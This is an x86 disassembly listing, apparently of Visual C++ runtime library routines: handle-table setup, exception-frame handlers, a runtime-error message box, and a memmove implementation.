loc_41D13D: ; CODE XREF: ___:0041D103�j
mov esi, dword_516C80
loc_41D143: ; CODE XREF: ___:0041D0EF�j
; ___:0041D13B�j
xor edi, edi
test esi, esi
jle short loc_41D18F
loc_41D149: ; CODE XREF: ___:0041D18D�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41D186
mov cl, [ebp+0]
test cl, 1
jz short loc_41D186
test cl, 8
jnz short loc_41D168
push eax
nop
call near ptr 7C810E51h
test eax, eax
jz short loc_41D186
loc_41D168: ; CODE XREF: ___:0041D15B�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_516B80[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41D186: ; CODE XREF: ___:0041D14E�j
; ___:0041D156�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41D149
loc_41D18F: ; CODE XREF: ___:0041D0C4�j
; ___:0041D0D0�j ...
xor ebx, ebx
loc_41D191: ; CODE XREF: ___:0041D1F4�j
mov eax, dword_516B80
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41D1EC
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41D1AC
push 0FFFFFFF6h
pop eax
jmp short loc_41D1B6
; ---------------------------------------------------------------------------
loc_41D1AC: ; CODE XREF: ___:0041D1A5�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41D1B6: ; CODE XREF: ___:0041D1AA�j
push eax
nop
call near ptr 7C812F39h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41D1DB
push edi
nop
call near ptr 7C810E51h
test eax, eax
jz short loc_41D1DB
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41D1E1
loc_41D1DB: ; CODE XREF: ___:0041D1C2�j
; ___:0041D1CD�j
or byte ptr [esi+4], 40h
jmp short loc_41D1F0
; ---------------------------------------------------------------------------
loc_41D1E1: ; CODE XREF: ___:0041D1D9�j
cmp eax, 3
jnz short loc_41D1F0
or byte ptr [esi+4], 8
jmp short loc_41D1F0
; ---------------------------------------------------------------------------
loc_41D1EC: ; CODE XREF: ___:0041D19D�j
or byte ptr [esi+4], 80h
loc_41D1F0: ; CODE XREF: ___:0041D1DF�j
; ___:0041D1E4�j ...
inc ebx
cmp ebx, 3
jl short loc_41D191
push dword_516C80
nop
call near ptr 7C80CC97h
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41D20C proc near ; CODE XREF: sub_41D304+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_41D224
push [ebp+arg_0]
call sub_4203E8
sub_41D20C endp
; ---------------------------------------------------------------------------
loc_41D224: ; DATA XREF: sub_41D20C+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D22C: ; DATA XREF: sub_41D24E+A�o
; ___:0041D2BF�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_41D24D
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_41D24D: ; CODE XREF: ___:0041D23C�j
retn
; =============== S U B R O U T I N E =======================================
sub_41D24E proc near ; CODE XREF: sub_41D304+67�p
; sub_41D304+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_41D22C
push large dword ptr fs:0
mov large fs:0, esp
loc_41D26B: ; CODE XREF: sub_41D24E:loc_41D2A6�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41D2A8
cmp esi, [esp+1Ch+arg_4]
jz short loc_41D2A8
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41D2A6
push 101h
mov eax, [ebx+esi*4+8]
call sub_41D2E2
call dword ptr [ebx+esi*4+8]
loc_41D2A6: ; CODE XREF: sub_41D24E+44�j
jmp short loc_41D26B
; ---------------------------------------------------------------------------
loc_41D2A8: ; CODE XREF: sub_41D24E+2A�j
; sub_41D24E+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41D24E endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_41D22C
jnz short locret_41D2D8
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41D2D8
mov eax, 1
locret_41D2D8: ; CODE XREF: ___:0041D2C6�j
; ___:0041D2D1�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_43BAD8
jmp short loc_41D2EC
; =============== S U B R O U T I N E =======================================
sub_41D2E2 proc near ; CODE XREF: sub_41D24E+4F�p
; sub_41D304+78�p
push ebx
push ecx
mov ebx, offset dword_43BAD8
mov ecx, [ebp+8]
loc_41D2EC: ; CODE XREF: ___:0041D2E0�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_41D2E2 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D304 proc near ; DATA XREF: sub_41BC2B+A�o
; sub_41D6F3+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41D3A4
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41D337: ; CODE XREF: sub_41D304+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41D39D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41D38B
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41D38B
js short loc_41D396
mov edi, [ebx+8]
push ebx
call sub_41D20C
; ---------------------------------------------------------------------------
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41D24E
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_41D2E2
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41D38B: ; CODE XREF: sub_41D304+40�j
; sub_41D304+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41D337
; ---------------------------------------------------------------------------
loc_41D396: ; CODE XREF: sub_41D304+54�j
mov eax, 0
jmp short loc_41D3B9
; ---------------------------------------------------------------------------
loc_41D39D: ; CODE XREF: sub_41D304+36�j
mov eax, 1
jmp short loc_41D3B9
; ---------------------------------------------------------------------------
loc_41D3A4: ; CODE XREF: sub_41D304+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41D24E
add esp, 8
pop ebp
mov eax, 1
loc_41D3B9: ; CODE XREF: sub_41D304+97�j
; sub_41D304+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D304 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41D24E
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41D3DC proc near ; CODE XREF: sub_4191E5+9�p
mov eax, dword_5158D8
cmp eax, 1
jz short loc_41D3F3
test eax, eax
jnz short locret_41D414
cmp dword_43B594, 1
jnz short locret_41D414
loc_41D3F3: ; CODE XREF: sub_41D3DC+8�j
push 0FCh
call sub_41D415
mov eax, dword_515A30
pop ecx
test eax, eax
jz short loc_41D409
call eax
loc_41D409: ; CODE XREF: sub_41D3DC+29�j
push 0FFh
call sub_41D415
pop ecx
locret_41D414: ; CODE XREF: sub_41D3DC+C�j
; sub_41D3DC+15�j
retn
sub_41D3DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D415 proc near ; CODE XREF: sub_4191E5+12�p
; sub_41D3DC+1C�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_43BAE8
loc_41D428: ; CODE XREF: sub_41D415+20�j
cmp edx, [eax]
jz short loc_41D437
add eax, 8
inc ecx
cmp eax, offset off_43BB78
jl short loc_41D428
loc_41D437: ; CODE XREF: sub_41D415+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_43BAE8[esi]
jnz loc_41D565
mov eax, dword_5158D8
cmp eax, 1
jz loc_41D53F
test eax, eax
jnz short loc_41D468
cmp dword_43B594, 1
jz loc_41D53F
loc_41D468: ; CODE XREF: sub_41D415+44�j
cmp edx, 0FCh
jz loc_41D565
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
nop
call near ptr 7C80B4CFh
test eax, eax
jnz short loc_41D49F
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_417A00
pop ecx
pop ecx
loc_41D49F: ; CODE XREF: sub_41D415+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_417AF0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41D4E2
lea eax, [ebp+var_1A4]
push eax
call sub_417AF0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4182F0
add esp, 10h
loc_41D4E2: ; CODE XREF: sub_41D415+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_417A00
lea eax, [ebp+var_A0]
push edi
push eax
call sub_417A10
lea eax, [ebp+var_A0]
push offset asc_4219C0 ; "\n\n"
push eax
call sub_417A10
push off_43BAEC[esi]
lea eax, [ebp+var_A0]
push eax
call sub_417A10
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_41EE5D
add esp, 2Ch
pop edi
jmp short loc_41D565
; ---------------------------------------------------------------------------
loc_41D53F: ; CODE XREF: sub_41D415+3C�j
; sub_41D415+4D�j
lea eax, [ebp+arg_0]
lea esi, off_43BAEC[esi]
push 0
push eax
push dword ptr [esi]
call sub_417AF0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
nop
call near ptr 7C812F39h
push eax
nop
call near ptr 7C810D87h
loc_41D565: ; CODE XREF: sub_41D415+2E�j
; sub_41D415+59�j ...
pop esi
leave
retn
sub_41D415 endp
; =============== S U B R O U T I N E =======================================
sub_41D568 proc near ; CODE XREF: sub_41922E+6C�p
; sub_41B582+32�p ...
arg_0 = dword ptr 4
inc dword_515A34
push 1000h
call sub_417BEE
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_41D591
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41D5A2
; ---------------------------------------------------------------------------
loc_41D591: ; CODE XREF: sub_41D568+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41D5A2: ; CODE XREF: sub_41D568+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41D568 endp
; =============== S U B R O U T I N E =======================================
sub_41D5AC proc near ; CODE XREF: sub_41922E+61�p
; sub_41C981+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_516C80
jb short loc_41D5BB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D5BB: ; CODE XREF: sub_41D5AC+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_516B80[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_41D5AC endp
; =============== S U B R O U T I N E =======================================
sub_41D5D2 proc near ; DATA XREF: ___:00423014�o
mov eax, dword_516B60
push esi
push 14h
test eax, eax
pop esi
jnz short loc_41D5E6
mov eax, 200h
jmp short loc_41D5EC
; ---------------------------------------------------------------------------
loc_41D5E6: ; CODE XREF: sub_41D5D2+B�j
cmp eax, esi
jge short loc_41D5F1
mov eax, esi
loc_41D5EC: ; CODE XREF: sub_41D5D2+12�j
mov dword_516B60, eax
loc_41D5F1: ; CODE XREF: sub_41D5D2+16�j
push 4
push eax
call sub_41EEE6
pop ecx
mov dword_515B4C, eax
test eax, eax
pop ecx
jnz short loc_41D625
push 4
push esi
mov dword_516B60, esi
call sub_41EEE6
pop ecx
mov dword_515B4C, eax
test eax, eax
pop ecx
jnz short loc_41D625
push 1Ah
call sub_4191E5
pop ecx
loc_41D625: ; CODE XREF: sub_41D5D2+30�j
; sub_41D5D2+49�j
xor ecx, ecx
mov eax, offset off_43BB78
loc_41D62C: ; CODE XREF: sub_41D5D2+6E�j
mov edx, dword_515B4C
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_43BDF8
jl short loc_41D62C
xor edx, edx
mov ecx, offset dword_43BB88
loc_41D649: ; CODE XREF: sub_41D5D2+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword_516B80[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_41D666
test eax, eax
jnz short loc_41D669
loc_41D666: ; CODE XREF: sub_41D5D2+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41D669: ; CODE XREF: sub_41D5D2+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_43BBE8
jl short loc_41D649
pop esi
retn
sub_41D5D2 endp
; =============== S U B R O U T I N E =======================================
sub_41D677 proc near ; DATA XREF: ___:00423020�o
; FUNCTION CHUNK AT 0041EF63 SIZE 00000058 BYTES
call sub_41B50C
cmp byte_5158C4, 0
jz short locret_41D68A
jmp loc_41EF63
; ---------------------------------------------------------------------------
locret_41D68A: ; CODE XREF: sub_41D677+C�j
retn
sub_41D677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D68B proc near ; CODE XREF: sub_419343+2D4�p
; sub_419343+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_41D697
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D697: ; CODE XREF: sub_41D68B+8�j
cmp dword_5158EC, 0
jnz short loc_41D6B2
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_41D6E4
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D6B2: ; CODE XREF: sub_41D68B+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_43B7AC
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_5158FC
nop
call near ptr 7C80A0D4h
test eax, eax
jz short loc_41D6E4
cmp [ebp+arg_0], 0
jz short loc_41D6F1
loc_41D6E4: ; CODE XREF: sub_41D68B+1E�j
; sub_41D68B+51�j
mov dword_515884, 2Ah
or eax, 0FFFFFFFFh
loc_41D6F1: ; CODE XREF: sub_41D68B+57�j
pop ebp
retn
sub_41D68B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6F3 proc near ; CODE XREF: sub_419B4D+5E�p
; sub_41C23B+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A00
push offset sub_41D304
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_515A38
xor ebx, ebx
cmp eax, ebx
jnz short loc_41D762
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4216A0
push esi
nop
call near ptr 7C80A490h
test eax, eax
jz short loc_41D740
mov eax, esi
jmp short loc_41D75D
; ---------------------------------------------------------------------------
loc_41D740: ; CODE XREF: sub_41D6F3+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_441700
push esi
push ebx
nop
call near ptr 7C838A0Ch
test eax, eax
jz loc_41D828
push 2
pop eax
loc_41D75D: ; CODE XREF: sub_41D6F3+4B�j
mov dword_515A38, eax
loc_41D762: ; CODE XREF: sub_41D6F3+2F�j
cmp eax, 2
jnz short loc_41D78B
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_41D773
mov eax, dword_5158EC
loc_41D773: ; CODE XREF: sub_41D6F3+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
nop
call near ptr 7C838A0Ch
jmp loc_41D82A
; ---------------------------------------------------------------------------
loc_41D78B: ; CODE XREF: sub_41D6F3+72�j
cmp eax, 1
jnz loc_41D828
cmp [ebp+arg_10], ebx
jnz short loc_41D7A1
mov eax, dword_5158FC
mov [ebp+arg_10], eax
loc_41D7A1: ; CODE XREF: sub_41D6F3+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
nop
call near ptr 7C809BF8h
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41D828
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_417430
add esp, 0Ch
jmp short loc_41D7F7
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_41D7F7: ; CODE XREF: sub_41D6F3+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_41D828
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
nop
call near ptr 7C809BF8h
cmp eax, ebx
jz short loc_41D828
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
nop
call near ptr 7C80A490h
jmp short loc_41D82A
; ---------------------------------------------------------------------------
loc_41D828: ; CODE XREF: sub_41D6F3+61�j
; sub_41D6F3+9B�j ...
xor eax, eax
loc_41D82A: ; CODE XREF: sub_41D6F3+93�j
; sub_41D6F3+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D6F3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D840 proc near ; CODE XREF: sub_419C82+2EE�p
; sub_41C8F5+1A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41D860
cmp edi, eax
jb loc_41D9D8
loc_41D860: ; CODE XREF: sub_41D840+16�j
test edi, 3
jnz short loc_41D87C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D89C
rep movsd
jmp off_41D988[edx*4]
; ---------------------------------------------------------------------------
loc_41D87C: ; CODE XREF: sub_41D840+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41D894
and eax, 3
add ecx, eax
jmp dword ptr loc_41D89C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D894: ; CODE XREF: sub_41D840+46�j
jmp dword ptr loc_41D998[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D89C: ; CODE XREF: sub_41D840+31�j
; sub_41D840+8E�j ...
jmp off_41D91C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41D8B0
dd offset loc_41D8DC
dd offset loc_41D900
; ---------------------------------------------------------------------------
loc_41D8B0: ; DATA XREF: sub_41D840+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41D89C
rep movsd
jmp off_41D988[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D8DC: ; DATA XREF: sub_41D840+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41D89C
rep movsd
jmp off_41D988[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D900: ; DATA XREF: sub_41D840+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41D89C
rep movsd
jmp off_41D988[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D91C dd offset loc_41D97F ; DATA XREF: sub_41D840:loc_41D89C�r
dd offset loc_41D96C
dd offset loc_41D964
dd offset loc_41D95C
dd offset loc_41D954
dd offset loc_41D94C
dd offset loc_41D944
dd offset loc_41D93C
; ---------------------------------------------------------------------------
loc_41D93C: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41D944: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41D94C: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41D954: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41D95C: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41D964: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41D96C: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D97F: ; CODE XREF: sub_41D840:loc_41D89C�j
; DATA XREF: sub_41D840:off_41D91C�o
jmp off_41D988[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D988 dd offset loc_41D998 ; DATA XREF: sub_41D840+35�r
; sub_41D840+92�r ...
dd offset loc_41D9A0
dd offset loc_41D9AC
dd offset loc_41D9C0
; ---------------------------------------------------------------------------
loc_41D998: ; CODE XREF: sub_41D840+35�j
; sub_41D840+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D9A0: ; CODE XREF: sub_41D840+35�j
; sub_41D840+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D9AC: ; CODE XREF: sub_41D840+35�j
; sub_41D840+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D9C0: ; CODE XREF: sub_41D840+35�j
; sub_41D840+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D9D8: ; CODE XREF: sub_41D840+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41DA0C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41DA00
std
rep movsd
cld
jmp off_41DB20[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41DA00: ; CODE XREF: sub_41D840+1B1�j
; sub_41D840+208�j ...
neg ecx
jmp dword ptr loc_41DACF+1[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41DA0C: ; CODE XREF: sub_41D840+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41DA24
and eax, 3
sub ecx, eax
jmp dword ptr loc_41DA24+4[eax*4]
; ---------------------------------------------------------------------------
loc_41DA24: ; CODE XREF: sub_41D840+1D6�j
; DATA XREF: sub_41D840+1DD�r
jmp off_41DB20[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41DA37+1
; ---------------------------------------------------------------------------
pop eax
fiadd dword ptr [ecx+0]
sbb dl, 41h
loc_41DA37: ; DATA XREF: sub_41D840+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_41DA00
std
rep movsd
cld
jmp off_41DB20[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41DA00
std
rep movsd
cld
jmp off_41DB20[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41DA00
std
rep movsd
cld
jmp off_41DB20[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41DAD4
dd offset loc_41DADC
dd offset loc_41DAE4
dd offset loc_41DAEC
dd offset loc_41DAF4
; ---------------------------------------------------------------------------
cld
fiadd dword ptr [ecx+0]
add al, 0DBh
inc ecx
loc_41DACF: ; DATA XREF: sub_41D840+1C2�r
add [edi], dl
fild dword ptr [ecx+0]
loc_41DAD4: ; DATA XREF: sub_41D840+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41DADC: ; DATA XREF: sub_41D840+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41DAE4: ; DATA XREF: sub_41D840+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41DAEC: ; DATA XREF: sub_41D840+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41DAF4: ; DATA XREF: sub_41D840+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41DB17: ; CODE XREF: sub_41D840+1C2�j
jmp off_41DB20[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41DB20 dd offset loc_41DB30 ; DATA XREF: sub_41D840+1B7�r
; sub_41D840:loc_41DA24�r ...
dd offset loc_41DB38
dd offset loc_41DB48
dd offset loc_41DB5C
; ---------------------------------------------------------------------------
loc_41DB30: ; CODE XREF: sub_41D840+1B7�j
; sub_41D840:loc_41DA24�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41DB38: ; CODE XREF: sub_41D840+1B7�j
; sub_41D840:loc_41DA24�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41DB48: ; CODE XREF: sub_41D840+1B7�j
; sub_41D840:loc_41DA24�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
